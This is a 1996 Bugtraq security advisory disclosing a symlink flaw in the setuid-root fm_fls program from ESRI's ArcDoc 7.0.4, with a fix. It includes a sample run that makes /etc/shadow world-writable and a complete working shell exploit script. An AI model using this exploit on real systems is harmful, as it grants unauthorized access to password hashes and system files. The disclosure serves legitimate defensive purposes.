[2603] in bugtraq
Security problem in ESRI's ArcDoc 7.0.4
daemon@ATHENA.MIT.EDU (James W. Abendschan)
Fri May 24 02:16:03 1996
Date: Thu, 23 May 1996 21:21:46 -0700
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: "James W. Abendschan" <jwa@nbs.nau.edu>
X-To: bugtraq@crimelab.com, unix-admin@lists.nau.edu, support@esri.com,
cert@cert.org
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
*** GIS & ESRI/ARC/Info shops take note! ***
The program "fm_fls" as distributed with ESRI's "ArcDoc" package (7.0.4)
contains a bug which allows us to (a) append somewhat arbitrary data
to any file and (b) change the permissions of that file to rw-rw-rw-.
fm_fls is setuid root.
When fm_fls is executed, it opens a logfile -- the default location
for this file is /tmp/fm_fls.log. Unfortunately, it does not check
whether this file already exists or whether it is a symbolic link.
If fm_fls gets bad arguments (a license file it cannot open, for
example), it writes the error message to the logfile, chowns the file
to root, gives the file 666 permissions, and exits.
If we make the logfile a symlink to a file we cannot read, the error
text is appended to that file and we gain world read/write access to
it, since both the write and the chmod follow the link.
Sample run:
> ecosys:~jwa/Security/Projects/r00tin> id
> uid=200(jwa) gid=107(cpin)
> ecosys:~jwa/Security/Projects/r00tin> ls -l /etc/shadow
> -rw------- 1 root other 1851 May 23 20:22 /etc/shadow
> ecosys:~jwa/Security/Projects/r00tin> fm.sploit /etc/shadow
> /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error. Unable to open License File woot
> fm.sploit of /etc/shadow yields:
> -rw-rw-rw- 1 root other 2011 May 23 20:38 /etc/shadow
> ecosys:~jwa/Security/Projects/r00tin> tail -5 /etc/shadow
> mpm:xxxxxxxxxxxxx:6445::::::
> ebp:xxxxxxxxxxxxx:6445::::::
> sml:xxxxxxxxxxxxx:6445::::::
> 1996/05/23-20:38:32 BG woot ecosys
> # 1996/05/23-20:38:32 /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error. Unable to open License File woot
> ecosys:~jwa/Security/Projects/r00tin>
Note the additional lines appended to the target file (in this case,
/etc/shadow).
To fix this, either (a) yell at your vendor or (b) chmod 555 `which fm_fls`.
I don't yet know the effects of removing the suid bit on fm_fls; I'd
like to hear feedback on this. I've seen fm_fls distributed with
other applications -- perhaps the bug is not specific to ARC/Info?
Comments are welcome.
James
#!/bin/sh
#
# exploit a bug in the fm_fls application as distributed with ARC/Info's
# ArcDoc (and others?) to give us rw access to any file.
#
# fix: chmod 555 `which fm_fls`
#
# tested on Solaris 2.5 w/ ArcDoc 7.0.4
#
# James Abendschan jwa@nbs.nau.edu 23 May 1996
#
# full path to the fm_fls executable
FM_FLS="/nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls"
# default logfile that fm_fls writes, chowns and chmods on an error
LOGFILE=/tmp/fm_fls.log
TMP=/tmp/exploit.$$
UNREADABLE="$1"

if [ $# -ne 1 ]
then
        echo "usage: `basename $0` filename"
        exit 1
fi

# the logfile must not already exist, otherwise our link is never created
rm -f "$LOGFILE"
if [ -f "$LOGFILE" ]
then
        echo "tried to remove $LOGFILE, but it still exists! Exploit won't work."
        exit 1
fi

# since fm_fls will complain if we link to a logfile too "far away"
# from the original file, we just do a dual link..
ln -s "$UNREADABLE" "$TMP"
ln -s "$TMP" "$LOGFILE"

# a bogus license file name forces the error path that writes the logfile
"$FM_FLS" woot

echo "`basename $0` of $UNREADABLE yields:"
ls -l "$UNREADABLE"

# all done, clean up.
rm -f "$TMP" "$LOGFILE"
exit 0
--
James W. Abendschan Email: jwa@nbs.nau.edu
UNIX Systems Programmer/Administrator Phone: (520) 556-7466 x238
Colorado Plateau Research Station, Flagstaff, AZ Voice mail: *516